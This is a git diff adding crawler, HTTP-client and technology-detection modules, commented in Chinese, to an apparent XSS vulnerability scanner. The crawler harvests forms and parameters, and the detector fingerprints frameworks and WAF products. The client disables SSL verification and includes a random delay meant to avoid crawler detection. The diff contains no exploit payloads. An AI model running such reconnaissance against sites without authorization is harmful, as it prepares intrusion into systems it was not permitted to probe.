z%3cZYfCS0<|0!ti1o}@&I_Fsh8cs&=san=`sRd1_^(mc}_|)eDAC)w!n#?~gxoDzq
zOJp4*IN_$H@t%H!05#+>-+v{Zbs0O7Q9)*n3IPw(W|{!)OT}}LRyT>=@i>^dyP3$Z
zNt<V)vnAp;E~U;k$haA41)j=D?21X7?T6Ww!p)4oGrz{K0kkzs%NEgAafjO%k$YRV
zG|nv}>@8@k4l2qOfVTWM4Q;iNzrtt{ZHHfd{_?p$j+{A_JpW7vT&4kTL!il5*X#*5
z0-~mo^RVk}^m%vG`C0;On3Vzdc<XT234v7LnS8G^c{G+bU^fngecwSJJ(Ya!$Ru%{
zhgD&=%RMg%Qvm=IuuZk{48>M>IFcV6BD7K~JkV%3ebui&ef5Zp&{zZARW%MBM~7HW
zK~92G30uZ`=)y!wIF-li^|8?ZVBLM2Idy#i2R%D|m^=-b2&hBJY2}mT4Cx2Q>4h49
zDx3y}^2d#*!Z4PY3jpCZ8zz^|O_lLiW`^z1v52PydjueOIv^r|>eniyu^g@F+Hhn;
zSJjcK*z$pb(!PQe3NMT;kKL89F74MW6RERDX`?pxvS~_mcl++>{`UQyfdSKkKGT9B
zYwqDazuMEC`)<Xl4JS7YSWEh>B}10H!&L{X5_6Zv_r!N3W>@rEDhKmzfX&lONAm!i
zZ%jc2GrN`@S=P1s$m-bgi}|G;ntx~KzghA2rZ+al8hhyv)qheC%vsYnXH6QfmiS|d
z+2#F~3gC53CqleA7a(4nE4~Mb8OwUK@x33-{>1yK{m%^_ZB67?^&9RR%AQUjUYmQ9
zwZU;*$SI$<)`330r+fi?K5^*Q*_lt4%vo2!{G~t%<qTVo95ccGv0lh-#d;SVq|$I<
z0u(AlTg|s1o@6Hy?&Fe6w)KLvo6bfXXMwfFxD;tNpG?8ht7xYaArIiNOUajD1^4C?
zv?nisjnDNYS2@&?hhQpEzc<~VJQ`2F-g-OT4m3M$63ry_?Q!e&1-12i7yo3*zS<(k
zUdV;Y9F8i&<Y2CT3t5dr!O_^qDR+9p-bPNzHa7*r91{qJNk^cWGX$D<l@K`(`*4uc
zus;7zUogyaYN@0EE-AU!%W@xR#zffN@MDSHDA*iE!RD|OwQjiqriU?FcA%_d%Yc4v
zpMI{;Wu6*sX>aLdUf9>V@ltkvn|jb>ex<Tg{qmO2O!K=d|7n{4IT#iUGB1GdH6^kX
zjA}so#$XDRAu42Hyr@(|;ShOn;hKe%_UwS0<VO6(EktNl%2WVRupt-igw{FGZ-d+p
zEwhlH5zS#m<PqQ|nZxg#N=A<-qi1e+gUumKjA4mva+i3OtT^y3T-168g~{^>9+85u
zVo8sPHCghRlO9|QJ->h-y9BaUG-^?R&1IU}QS!o`HU%7J$Jzmt{i4a<xvtM-PiX8y
z{>>;&DRVwIS#GifC!Z=PL|t?tdV`*qserPv^`o-|$26hA==x!tt$JWDO4sFc$FFoe
zH}d}ZD<8anTLHtNmOV~eI_czuY`sH)i7|_b7yG!D4S9F4CE#<3#Zuya5mQ`tzl14d
z53B<EzylLn$2(zPwmvC2VNjHLgKx%{33Jgo;|&4H!xNZ+Awb?%U@rJ)mwV0)A3aN4
zG~&&OJI(OYL>mATDFt^+*-Q?FGl<?6UlX2d0t|p!!eebrDG;H@OQG{g__1$6Cg9c-
z0h|m|2K4!T`us$}y#xBHK7Ez!%=|Q-6IUme?MYZ4@7L_*sfn*-oz<;;`Il{mK~w&K
zsSy6;r?Ds&iTM+y8xr{&`wg2!XKD6roux%FU+lqnWiQiHeohr{Nm$qPYsyp363&68
zP7Hs$py$??@=pE-@f)OA2E11^Si!(YNYw;d$0e|g;Y@jeOhpWsNE47rHtc)HlWj*v
zj>SgKp9kOlwsI^yHDGmS(oa&DYa9%o3zKqcZ)j&Tn8cjYhj9o4aH_>uEFC*jSC4&u
zUkhFVL%ZO|mOv(4eKxsF1p!fwE~-1A>sZ#W$saUje>0@dik7vPjUfRzM;Z7E=y_n8
z9UZfjF=wc<O!Oow#=l7m0lz1@lsg5hNLUGs5LhNLN2&?0aj8_SOU_h1F+sp`hTs*w
z0%qmwh2UVxmsm|!H7>anZW=;e%Jkq9F=6y@#eNkC12MMw1Q&l7F^TTLPrZ%U;Cyn+
z22-ZH1)(QRkSS-t8REYg&d{?kR1~C*H8uA`IOlc()adinLkPub6X^gx1g!e1_qC0D
z-(u$jo~DRz@d}|@EL4jpDPbJ7f}@;~>98Of5~U?cQ7JI_2y7+KzH+(etT2l(iLjEI
z2vJudkR}e5;!IU1Rd_yhf+-fpU_;5COPY(K;MC$KIfGCD11*4AP9@X?h$Ht45GP`s
zS;jbVC|(QwzlR_DG-T<bu2<%KVV!w+-@$#|u8USjo8i*5!nXB;rkv;#?N3Dazp%f1
zcI<)A3YQF-ryVvPG$!oJd*<~_Pn6dtW<Anx-u}6@;F=m)XOHTT*#b&p$&C6Gz01ZI
zzq2dWn6QE(m8BqTjBNXWqkINBqk!zgJjgEO(IlUttC-4Mm~XGhVm{7NLOBEJepD(r
zxbLM@tuRnjs>)DkN5FSGo$~U%pi=@_x=IoEdGRWcE}~F2QY#i}lhr2-Q8~m>t1^uY
zaXpekLBuVkP-GHe4oRJeJs_x)FizGcyc&AIm4VlQ?2iSHo-arWBh<cIVZ@<$GqCy_
z{QiH1DeIZmqe-lJC^75de)G0FD9oaFy>a_HBofQV08$Er*O9%^HR~N_PF+`5AM)1K
z@oyg{<{GCav1y1&a|VbqHw7Lo;;kSdLal|+{1!fREdUHTKR!Oe`)s@m!COK6d&naN
zzx$I2!#^94U^Qu0?hMsOntb=*pF<nGEQloqcm^rznuewnV;V&1E+OqDWc(Mhf1x!G
zX!HJ|&FfrsQR`?`T~`!P<{K;LQReISQ+be=8L6D>HfX%Qatf5@O{a3kN+9E>{4c`-
B=?wq?

literal 0
HcmV?d00001

diff --git a/xss_scanner/utils/crawler.py b/xss_scanner/utils/crawler.py
new file mode 100644
index 0000000..1dda4c6
--- /dev/null
+++ b/xss_scanner/utils/crawler.py
@@ -0,0 +1,398 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+
+"""
+爬虫模块，负责爬取目标网站的页面
+"""
+
+import re
+import logging
+import threading
+import queue
+import time
+from urllib.parse import urlparse, urljoin, parse_qsl
+from bs4 import BeautifulSoup
+from concurrent.futures import ThreadPoolExecutor
+
+logger = logging.getLogger('xss_scanner')
+
+class Crawler:
+    """爬虫类，负责爬取网站页面"""
+    
+    def __init__(self, http_client, max_depth=2, threads=5, exclude_pattern=None, include_pattern=None):
+        """
+        初始化爬虫
+        
+        Args:
+            http_client: HTTP客户端
+            max_depth: 最大爬取深度
+            threads: 线程数
+            exclude_pattern: 排除URL模式
+            include_pattern: 包含URL模式
+        """
+        self.http_client = http_client
+        self.max_depth = max_depth
+        self.threads = threads
+        self.exclude_pattern = exclude_pattern
+        self.include_pattern = include_pattern
+        
+        # 已访问的URL
+        self.visited_urls = set()
+        
+        # 待访问的URL队列
+        self.url_queue = queue.Queue()
+        
+        # 存储爬取结果
+        self.results = []
+        
+        # 线程锁
+        self.lock = threading.Lock()
+        
+        # 线程池
+        self.thread_pool = None
+        
+        # 记录每个页面的加载状态
+        self.page_status = {}
+        
+        # 常见的静态资源文件扩展名
+        self.static_extensions = {
+            '.css', '.js', '.jpg', '.jpeg', '.png', '.gif', '.svg', '.ico', '.pdf', 
+            '.doc', '.docx', '.xls', '.xlsx', '.ppt', '.pptx', '.zip', '.rar', '.tar', 
+            '.gz', '.mp3', '.mp4', '.avi', '.mov', '.flv', '.wmv'
+        }
+    
+    def crawl(self, base_url):
+        """
+        爬取指定的网站
+        
+        Args:
+            base_url: 基础URL
+            
+        Returns:
+            list: 爬取结果，包含页面信息
+        """
+        logger.info(f"开始爬取网站: {base_url}")
+        
+        # 重置状态
+        self.visited_urls = set()
+        self.url_queue = queue.Queue()
+        self.results = []
+        self.page_status = {}
+        
+        # 解析基础URL
+        parsed_base_url = urlparse(base_url)
+        self.base_domain = parsed_base_url.netloc
+        
+        # 添加基础URL到队列
+        self.url_queue.put((base_url, 0))  # (url, depth)
+        
+        # 创建线程池
+        self.thread_pool = ThreadPoolExecutor(max_workers=self.threads)
+        
+        # 创建并启动爬虫线程
+        workers = []
+        for _ in range(self.threads):
+            worker = threading.Thread(target=self._worker)
+            workers.append(worker)
+            worker.start()
+        
+        # 等待所有线程完成
+        for worker in workers:
+            worker.join()
+        
+        logger.info(f"爬取完成，共发现 {len(self.results)} 个页面")
+        
+        return self.results
+    
+    def _worker(self):
+        """爬虫工作线程"""
+        while True:
+            try:
+                # 获取URL和深度
+                url, depth = self.url_queue.get(block=False)
+                
+                # 处理URL
+                self._process_url(url, depth)
+                
+                # 标记任务完成
+                self.url_queue.task_done()
+            except queue.Empty:
+                # 队列为空，检查是否所有线程都空闲
+                with self.lock:
+                    if self.url_queue.empty():
+                        break
+            except Exception as e:
+                logger.error(f"爬虫线程错误: {str(e)}")
+    
+    def _process_url(self, url, depth):
+        """
+        处理URL
+        
+        Args:
+            url: 要处理的URL
+            depth: 当前深度
+        """
+        # 如果超过最大深度，则跳过
+        if depth > self.max_depth:
+            return
+            
+        # 如果URL已访问，则跳过
+        if url in self.visited_urls:
+            return
+            
+        # 添加到已访问集合
+        with self.lock:
+            self.visited_urls.add(url)
+        
+        # 检查URL是否符合过滤条件
+        if not self._should_crawl(url):
+            return
+            
+        logger.debug(f"爬取页面: {url}")
+        
+        # 发送HTTP请求
+        response = self.http_client.get(url)
+        if not response or response.status_code != 200:
+            logger.debug(f"页面获取失败: {url}, 状态码: {response.status_code if response else 'None'}")
+            return
+            
+        # 解析页面内容
+        content_type = response.headers.get('Content-Type', '')
+        if 'text/html' not in content_type:
+            logger.debug(f"跳过非HTML页面: {url}, Content-Type: {content_type}")
+            return
+            
+        # 解析HTML
+        soup = BeautifulSoup(response.text, 'html.parser')
+        
+        # 提取页面信息
+        page_info = self._extract_page_info(url, soup, response)
+        
+        # 添加到结果
+        with self.lock:
+            self.results.append(page_info)
+        
+        # 如果未达到最大深度，则提取链接
+        if depth < self.max_depth:
+            links = self._extract_links(url, soup)
+            for link in links:
+                # 添加到队列
+                self.url_queue.put((link, depth + 1))
+    
+    def _extract_page_info(self, url, soup, response):
+        """
+        提取页面信息
+        
+        Args:
+            url: 页面URL
+            soup: BeautifulSoup对象
+            response: 响应对象
+            
+        Returns:
+            dict: 页面信息
+        """
+        # 提取页面标题
+        title = soup.title.string if soup.title else "No Title"
+        
+        # 提取表单
+        forms = self._extract_forms(url, soup)
+        
+        # 提取URL参数
+        params = self._extract_params(url)
+        
+        # 提取JavaScript事件
+        events = self._extract_js_events(soup)
+        
+        # 提取HTTP头
+        headers = dict(response.headers)
+        
+        return {
+            'url': url,
+            'title': title,
+            'forms': forms,
+            'params': params,
+            'events': events,
+            'headers': headers,
+            'status_code': response.status_code,
+            'content_length': len(response.content),
+            'cookies': dict(response.cookies)
+        }
+    
+    def _extract_links(self, base_url, soup):
+        """
+        提取页面中的链接
+        
+        Args:
+            base_url: 基础URL
+            soup: BeautifulSoup对象
+            
+        Returns:
+            list: 提取的链接列表
+        """
+        links = []
+        
+        # 提取<a>标签链接
+        for a in soup.find_all('a', href=True):
+            link = a['href'].strip()
+            if link:
+                full_url = urljoin(base_url, link)
+                links.append(full_url)
+        
+        # 提取<form>标签链接
+        for form in soup.find_all('form', action=True):
+            link = form['action'].strip()
+            if link:
+                full_url = urljoin(base_url, link)
+                links.append(full_url)
+        
+        # 过滤链接
+        filtered_links = []
+        for link in links:
+            # 跳过锚点链接
+            if '#' in link:
+                link = link.split('#')[0]
+                if not link:
+                    continue
+            
+            # 跳过JavaScript链接
+            if link.startswith('javascript:'):
+                continue
+                
+            # 跳过邮件链接
+            if link.startswith('mailto:'):
+                continue
+                
+            # 跳过电话链接
+            if link.startswith('tel:'):
+                continue
+                
+            # 跳过静态资源文件
+            parsed_link = urlparse(link)
+            path = parsed_link.path.lower()
+            if any(path.endswith(ext) for ext in self.static_extensions):
+                continue
+                
+            # 只爬取同一域名
+            if parsed_link.netloc and parsed_link.netloc != self.base_domain:
+                continue
+                
+            filtered_links.append(link)
+        
+        return list(set(filtered_links))
+    
+    def _extract_forms(self, base_url, soup):
+        """
+        提取页面中的表单
+        
+        Args:
+            base_url: 基础URL
+            soup: BeautifulSoup对象
+            
+        Returns:
+            list: 表单列表
+        """
+        forms = []
+        
+        for form in soup.find_all('form'):
+            form_info = {
+                'id': form.get('id', ''),
+                'name': form.get('name', ''),
+                'method': form.get('method', 'get').upper(),
+                'action': urljoin(base_url, form.get('action', '')),
+                'fields': []
+            }
+            
+            # 提取表单字段
+            for field in form.find_all(['input', 'textarea', 'select']):
+                # 跳过隐藏字段
+                if field.name == 'input' and field.get('type') == 'hidden':
+                    continue
+                    
+                field_info = {
+                    'name': field.get('name', ''),
+                    'id': field.get('id', ''),
+                    'type': field.get('type', 'text') if field.name == 'input' else field.name,
+                    'value': field.get('value', '')
+                }
+                
+                form_info['fields'].append(field_info)
+                
+            forms.append(form_info)
+            
+        return forms
+    
+    def _extract_params(self, url):
+        """
+        提取URL参数
+        
+        Args:
+            url: URL
+            
+        Returns:
+            list: 参数列表
+        """
+        parsed_url = urlparse(url)
+        params = [p[0] for p in parse_qsl(parsed_url.query)]
+        return params
+    
+    def _extract_js_events(self, soup):
+        """
+        提取JavaScript事件
+        
+        Args:
+            soup: BeautifulSoup对象
+            
+        Returns:
+            list: 事件列表
+        """
+        events = []
+        
+        # 常见的JavaScript事件属性
+        js_events = [
+            'onclick', 'onmouseover', 'onmouseout', 'onload', 'onerror', 'onsubmit',
+            'onchange', 'onkeyup', 'onkeydown', 'onkeypress', 'onblur', 'onfocus',
+            'onreset', 'onselect', 'onabort', 'ondblclick', 'onmousedown', 'onmouseup',
+            'onmousemove', 'onunload'
+        ]
+        
+        # 查找所有带有JavaScript事件的标签
+        for tag in soup.find_all():
+            for event in js_events:
+                if tag.has_attr(event):
+                    events.append({
+                        'tag': tag.name,
+                        'event': event,
+                        'code': tag[event]
+                    })
+                    
+        return events
+    
+    def _should_crawl(self, url):
+        """
+        检查URL是否应该爬取
+        
+        Args:
+            url: URL
+            
+        Returns:
+            bool: 是否应该爬取
+        """
+        # 检查是否是HTTP或HTTPS协议
+        if not url.startswith(('http://', 'https://')):
+            return False
+            
+        # 检查排除模式
+        if self.exclude_pattern and re.search(self.exclude_pattern, url):
+            return False
+            
+        # 检查包含模式
+        if self.include_pattern and not re.search(self.include_pattern, url):
+            return False
+            
+        # 检查是否是静态资源文件
+        parsed_url = urlparse(url)
+        path = parsed_url.path.lower()
+        if any(path.endswith(ext) for ext in self.static_extensions):
+            return False
+            
+        return True 
\ No newline at end of file
diff --git a/xss_scanner/utils/http_client.py b/xss_scanner/utils/http_client.py
new file mode 100644
index 0000000..e2f1f77
--- /dev/null
+++ b/xss_scanner/utils/http_client.py
@@ -0,0 +1,315 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+
+"""
+HTTP客户端模块，负责发送HTTP请求
+"""
+
+import logging
+import requests
+import random
+import time
+from urllib.parse import urlparse, urljoin
+from requests.exceptions import RequestException, Timeout, ConnectionError
+from requests.packages.urllib3.exceptions import InsecureRequestWarning
+
+# 禁用不安全请求的警告
+requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
+
+logger = logging.getLogger('xss_scanner')
+
+class HttpClient:
+    """HTTP客户端类，负责处理HTTP请求"""
+    
+    def __init__(self, timeout=10, user_agent=None, proxy=None, cookies=None, headers=None, verify_ssl=False):
+        """
+        初始化HTTP客户端
+        
+        Args:
+            timeout: 请求超时时间
+            user_agent: 用户代理
+            proxy: 代理
+            cookies: Cookies
+            headers: 自定义HTTP头
+            verify_ssl: 是否验证SSL证书
+        """
+        self.timeout = timeout
+        self.user_agent = user_agent
+        self.proxy = proxy
+        self.cookies = cookies or {}
+        self.headers = headers or {}
+        self.verify_ssl = verify_ssl
+        self.session = requests.Session()
+        
+        # 设置默认User-Agent
+        if not self.user_agent:
+            self.user_agent = (
+                "Mozilla/5.0 (Windows NT 10.0; Win64; x64) "
+                "AppleWebKit/537.36 (KHTML, like Gecko) "
+                "Chrome/91.0.4472.124 Safari/537.36"
+            )
+            
+        # 设置默认请求头
+        if 'User-Agent' not in self.headers:
+            self.headers['User-Agent'] = self.user_agent
+            
+    def get(self, url, params=None, headers=None, cookies=None, allow_redirects=True, timeout=None):
+        """
+        发送GET请求
+        
+        Args:
+            url: 请求的URL
+            params: 请求参数
+            headers: 请求头
+            cookies: Cookies
+            allow_redirects: 是否允许重定向
+            timeout: 超时时间
+            
+        Returns:
+            requests.Response: 响应对象
+        """
+        merged_headers = self._merge_headers(headers)
+        merged_cookies = self._merge_cookies(cookies)
+        timeout = timeout or self.timeout
+        
+        try:
+            response = self.session.get(
+                url=url,
+                params=params,
+                headers=merged_headers,
+                cookies=merged_cookies,
+                proxies=self._get_proxies(),
+                allow_redirects=allow_redirects,
+                timeout=timeout,
+                verify=self.verify_ssl
+            )
+            return response
+        except Timeout:
+            logger.warning(f"请求超时: {url}")
+        except ConnectionError:
+            logger.warning(f"连接错误: {url}")
+        except RequestException as e:
+            logger.warning(f"请求异常: {url} - {str(e)}")
+        except Exception as e:
+            logger.error(f"发送GET请求时发生错误: {url} - {str(e)}")
+            
+        return None
+        
+    def post(self, url, data=None, json=None, headers=None, cookies=None, allow_redirects=True, timeout=None):
+        """
+        发送POST请求
+        
+        Args:
+            url: 请求的URL
+            data: 表单数据
+            json: JSON数据
+            headers: 请求头
+            cookies: Cookies
+            allow_redirects: 是否允许重定向
+            timeout: 超时时间
+            
+        Returns:
+            requests.Response: 响应对象
+        """
+        merged_headers = self._merge_headers(headers)
+        merged_cookies = self._merge_cookies(cookies)
+        timeout = timeout or self.timeout
+        
+        try:
+            response = self.session.post(
+                url=url,
+                data=data,
+                json=json,
+                headers=merged_headers,
+                cookies=merged_cookies,
+                proxies=self._get_proxies(),
+                allow_redirects=allow_redirects,
+                timeout=timeout,
+                verify=self.verify_ssl
+            )
+            return response
+        except Timeout:
+            logger.warning(f"请求超时: {url}")
+        except ConnectionError:
+            logger.warning(f"连接错误: {url}")
+        except RequestException as e:
+            logger.warning(f"请求异常: {url} - {str(e)}")
+        except Exception as e:
+            logger.error(f"发送POST请求时发生错误: {url} - {str(e)}")
+            
+        return None
+        
+    def head(self, url, headers=None, cookies=None, allow_redirects=True, timeout=None):
+        """
+        发送HEAD请求
+        
+        Args:
+            url: 请求的URL
+            headers: 请求头
+            cookies: Cookies
+            allow_redirects: 是否允许重定向
+            timeout: 超时时间
+            
+        Returns:
+            requests.Response: 响应对象
+        """
+        merged_headers = self._merge_headers(headers)
+        merged_cookies = self._merge_cookies(cookies)
+        timeout = timeout or self.timeout
+        
+        try:
+            response = self.session.head(
+                url=url,
+                headers=merged_headers,
+                cookies=merged_cookies,
+                proxies=self._get_proxies(),
+                allow_redirects=allow_redirects,
+                timeout=timeout,
+                verify=self.verify_ssl
+            )
+            return response
+        except Exception as e:
+            logger.error(f"发送HEAD请求时发生错误: {url} - {str(e)}")
+            
+        return None
+        
+    def request(self, method, url, **kwargs):
+        """
+        发送自定义请求
+        
+        Args:
+            method: 请求方法
+            url: 请求的URL
+            **kwargs: 其他参数
+            
+        Returns:
+            requests.Response: 响应对象
+        """
+        # 合并请求头和Cookies
+        if 'headers' in kwargs:
+            kwargs['headers'] = self._merge_headers(kwargs['headers'])
+        else:
+            kwargs['headers'] = self._merge_headers({})
+            
+        if 'cookies' in kwargs:
+            kwargs['cookies'] = self._merge_cookies(kwargs['cookies'])
+        else:
+            kwargs['cookies'] = self._merge_cookies({})
+            
+        # 设置代理
+        kwargs['proxies'] = self._get_proxies()
+        
+        # 设置默认参数
+        kwargs.setdefault('timeout', self.timeout)
+        kwargs.setdefault('verify', self.verify_ssl)
+        
+        try:
+            response = self.session.request(method, url, **kwargs)
+            return response
+        except Exception as e:
+            logger.error(f"发送{method}请求时发生错误: {url} - {str(e)}")
+            
+        return None
+        
+    def download_file(self, url, save_path, chunk_size=8192):
+        """
+        下载文件
+        
+        Args:
+            url: 文件URL
+            save_path: 保存路径
+            chunk_size: 块大小
+            
+        Returns:
+            bool: 下载是否成功
+        """
+        try:
+            response = self.get(url, stream=True)
+            if not response or response.status_code != 200:
+                logger.error(f"下载文件失败, 状态码: {response.status_code if response else 'None'}")
+                return False
+                
+            with open(save_path, 'wb') as f:
+                for chunk in response.iter_content(chunk_size=chunk_size):
+                    if chunk:
+                        f.write(chunk)
+                        
+            return True
+        except Exception as e:
+            logger.error(f"下载文件时发生错误: {url} - {str(e)}")
+            return False
+            
+    def submit_form(self, url, form_data, method='POST', headers=None, cookies=None):
+        """
+        提交表单
+        
+        Args:
+            url: 表单提交URL
+            form_data: 表单数据
+            method: 提交方法
+            headers: 请求头
+            cookies: Cookies
+            
+        Returns:
+            requests.Response: 响应对象
+        """
+        if method.upper() == 'POST':
+            return self.post(url, data=form_data, headers=headers, cookies=cookies)
+        else:
+            return self.get(url, params=form_data, headers=headers, cookies=cookies)
+            
+    def _merge_headers(self, headers=None):
+        """
+        合并请求头
+        
+        Args:
+            headers: 请求头
+            
+        Returns:
+            dict: 合并后的请求头
+        """
+        merged = self.headers.copy()
+        if headers:
+            merged.update(headers)
+        return merged
+        
+    def _merge_cookies(self, cookies=None):
+        """
+        合并Cookies
+        
+        Args:
+            cookies: Cookies
+            
+        Returns:
+            dict: 合并后的Cookies
+        """
+        merged = self.cookies.copy()
+        if cookies:
+            merged.update(cookies)
+        return merged
+        
+    def _get_proxies(self):
+        """
+        获取代理配置
+        
+        Returns:
+            dict: 代理配置
+        """
+        if not self.proxy:
+            return {}
+            
+        return {
+            'http': self.proxy,
+            'https': self.proxy
+        }
+        
+    def delay_request(self, min_delay=1, max_delay=3):
+        """
+        延迟请求以避免被目标网站检测为爬虫
+        
+        Args:
+            min_delay: 最小延迟时间(秒)
+            max_delay: 最大延迟时间(秒)
+        """
+        delay = random.uniform(min_delay, max_delay)
+        time.sleep(delay) 
\ No newline at end of file
diff --git a/xss_scanner/utils/tech_detector.py b/xss_scanner/utils/tech_detector.py
new file mode 100644
index 0000000..d35d723
--- /dev/null
+++ b/xss_scanner/utils/tech_detector.py
@@ -0,0 +1,384 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+
+"""
+技术检测模块，用于识别网页使用的技术、框架和编程语言
+"""
+
+import re
+import logging
+import json
+from urllib.parse import urlparse
+from bs4 import BeautifulSoup
+
+logger = logging.getLogger('xss_scanner')
+
+class TechDetector:
+    """网站技术检测类，用于识别网站使用的技术栈"""
+    
+    def __init__(self):
+        """初始化技术检测器"""
+        # 前端框架特征
+        self.frontend_frameworks = {
+            'React': [
+                ('script', {'src': re.compile(r'react(-|\.min\.)?\.js')}),
+                ('script', {'src': re.compile(r'react-dom(-|\.min\.)?\.js')}),
+                ('meta', {'name': 'generator', 'content': re.compile(r'react', re.I)}),
+                ('div', {'id': 'root'}),
+                ('div', {'id': 'app'}),
+                ('meta', {'name': 'next-head-count'}),
+                ('code', {'id': '__NEXT_DATA__'})
+            ],
+            'Vue.js': [
+                ('script', {'src': re.compile(r'vue(-|\.min\.)?\.js')}),
+                ('div', {'id': 'app'}),
+                ('div', {'id': 'vue-app'}),
+                ('div', {'class': 'v-application'}),
+                ('meta', {'name': 'generator', 'content': re.compile(r'vue', re.I)})
+            ],
+            'Angular': [
+                ('script', {'src': re.compile(r'angular(-|\.min\.)?\.js')}),
+                ('*', {'ng-app': re.compile(r'.*')}),
+                ('*', {'ng-controller': re.compile(r'.*')}),
+                ('*', {'ng-repeat': re.compile(r'.*')}),
+                ('*', {'ng-bind': re.compile(r'.*')}),
+                ('*', {'ng-model': re.compile(r'.*')})
+            ],
+            'jQuery': [
+                ('script', {'src': re.compile(r'jquery(-|\.min\.)?\.js')}),
+            ],
+            'Bootstrap': [
+                ('link', {'href': re.compile(r'bootstrap(-|\.min\.)?\.css')}),
+                ('script', {'src': re.compile(r'bootstrap(-|\.min\.)?\.js')}),
+                ('div', {'class': re.compile(r'container(-fluid)?')}),
+                ('div', {'class': re.compile(r'row')}),
+                ('div', {'class': re.compile(r'col(-[a-z]+-[0-9]+)?')})
+            ]
+        }
+        
+        # 后端框架和语言特征
+        self.backend_technologies = {
+            'PHP': [
+                ('X-Powered-By', re.compile(r'PHP/?', re.I)),
+                ('Set-Cookie', re.compile(r'PHPSESSID', re.I)),
+                ('link', {'href': re.compile(r'\.php')}),
+                ('a', {'href': re.compile(r'\.php')}),
+                ('form', {'action': re.compile(r'\.php')})
+            ],
+            'WordPress': [
+                ('meta', {'name': 'generator', 'content': re.compile(r'WordPress', re.I)}),
+                ('link', {'href': re.compile(r'wp-content')}),
+                ('script', {'src': re.compile(r'wp-includes')}),
+                ('link', {'rel': 'https://api.w.org/'}),
+                ('meta', {'property': 'og:site_name'}),
+                ('body', {'class': re.compile(r'wordpress')})
+            ],
+            'Laravel': [
+                ('input', {'name': '_token'}),
+                ('meta', {'name': 'csrf-token'}),
+                ('script', {'src': re.compile(r'vendor/laravel')}),
+                ('Set-Cookie', re.compile(r'laravel_session', re.I))
+            ],
+            'Django': [
+                ('input', {'name': 'csrfmiddlewaretoken'}),
+                ('meta', {'name': 'csrf-token'}),
+                ('X-Frame-Options', 'SAMEORIGIN')
+            ],
+            'Flask': [
+                ('form', {'action': re.compile(r'\/[a-z0-9_]+\/?')}),
+                ('Set-Cookie', re.compile(r'session=', re.I))
+            ],
+            'Python': [
+                ('Server', re.compile(r'(Python|Werkzeug|Django|Tornado|Flask|CherryPy)', re.I)),
+                ('X-Powered-By', re.compile(r'(Python|Werkzeug|Django|Tornado|Flask|CherryPy)', re.I))
+            ],
+            'ASP.NET': [
+                ('X-Powered-By', re.compile(r'ASP\.NET', re.I)),
+                ('X-AspNet-Version', re.compile(r'.*')),
+                ('Set-Cookie', re.compile(r'ASP\.NET_SessionId', re.I)),
+                ('form', {'action': re.compile(r'\.aspx')}),
+                ('input', {'name': '__VIEWSTATE'})
+            ],
+            'Node.js': [
+                ('X-Powered-By', re.compile(r'Express', re.I)),
+                ('Set-Cookie', re.compile(r'connect\.sid', re.I))
+            ],
+            'Ruby on Rails': [
+                ('X-Powered-By', re.compile(r'Phusion Passenger|Ruby|Rails', re.I)),
+                ('Set-Cookie', re.compile(r'_session_id', re.I)),
+                ('meta', {'name': 'csrf-param', 'content': 'authenticity_token'})
+            ],
+            'Java': [
+                ('X-Powered-By', re.compile(r'(JSP|Servlet|Tomcat|JBoss|GlassFish|WebLogic|WebSphere|Jetty)', re.I)),
+                ('Server', re.compile(r'(Tomcat|JBoss|GlassFish|WebLogic|WebSphere|Jetty)', re.I)),
+                ('Set-Cookie', re.compile(r'JSESSIONID', re.I))
+            ],
+            'Go': [
+                ('Server', re.compile(r'(go httpserver)', re.I)),
+                ('X-Powered-By', re.compile(r'(go|gin|echo)', re.I))
+            ]
+        }
+        
+        # 服务器特征
+        self.server_technologies = {
+            'Nginx': [
+                ('Server', re.compile(r'nginx', re.I))
+            ],
+            'Apache': [
+                ('Server', re.compile(r'apache', re.I))
+            ],
+            'IIS': [
+                ('Server', re.compile(r'IIS', re.I))
+            ],
+            'LiteSpeed': [
+                ('Server', re.compile(r'LiteSpeed', re.I))
+            ],
+            'Cloudflare': [
+                ('Server', re.compile(r'cloudflare', re.I)),
+                ('CF-RAY', re.compile(r'.*')),
+                ('CF-Cache-Status', re.compile(r'.*'))
+            ],
+            'Varnish': [
+                ('X-Varnish', re.compile(r'.*')),
+                ('X-Varnish-Cache', re.compile(r'.*'))
+            ]
+        }
+        
+        # WAF特征
+        self.waf_technologies = {
+            'Cloudflare': [
+                ('Server', re.compile(r'cloudflare', re.I)),
+                ('CF-RAY', re.compile(r'.*'))
+            ],
+            'ModSecurity': [
+                ('Server', re.compile(r'mod_security', re.I)),
+                ('X-Mod-Security', re.compile(r'.*'))
+            ],
+            'Sucuri': [
+                ('X-Sucuri-ID', re.compile(r'.*')),
+                ('X-Sucuri-Cache', re.compile(r'.*'))
+            ],
+            'Imperva': [
+                ('X-Iinfo', re.compile(r'.*')),
+                ('Set-Cookie', re.compile(r'incap_ses', re.I))
+            ],
+            'Akamai': [
+                ('X-Akamai-Transformed', re.compile(r'.*')),
+                ('Set-Cookie', re.compile(r'ak_bmsc', re.I))
+            ],
+            'F5 BIG-IP': [
+                ('Set-Cookie', re.compile(r'BIGipServer', re.I)),
+                ('Server', re.compile(r'BigIP', re.I))
+            ],
+            'Barracuda': [
+                ('Set-Cookie', re.compile(r'barra_counter_session', re.I))
+            ]
+        }
+        
+    def detect(self, response, content=None):
+        """
+        检测网页使用的技术
+        
+        Args:
+            response: HTTP响应对象
+            content: HTML内容(可选)
+            
+        Returns:
+            dict: 检测到的技术信息
+        """
+        if not response:
+            return {}
+            
+        results = {
+            'frontend': [],
+            'backend': [],
+            'server': [],
+            'waf': []
+        }
+        
+        # 提取HTML内容
+        html_content = content or response.text
+        
+        # 解析HTML
+        try:
+            soup = BeautifulSoup(html_content, 'html.parser')
+        except Exception as e:
+            logger.error(f"解析HTML时发生错误: {str(e)}")
+            soup = None
+        
+        # 检测前端框架
+        if soup:
+            for framework, patterns in self.frontend_frameworks.items():
+                for tag_name, attrs in patterns:
+                    elements = soup.find_all(tag_name, attrs)
+                    if elements:
+                        if framework not in results['frontend']:
+                            results['frontend'].append(framework)
+                            break
+        
+        # 检测后端技术
+        headers = response.headers
+        
+        # 基于HTTP头的检测
+        for tech, patterns in self.backend_technologies.items():
+            for header_name, pattern in patterns:
+                if header_name in headers:
+                    if isinstance(pattern, re.Pattern) and pattern.search(headers[header_name]):
+                        if tech not in results['backend']:
+                            results['backend'].append(tech)
+                            break
+        
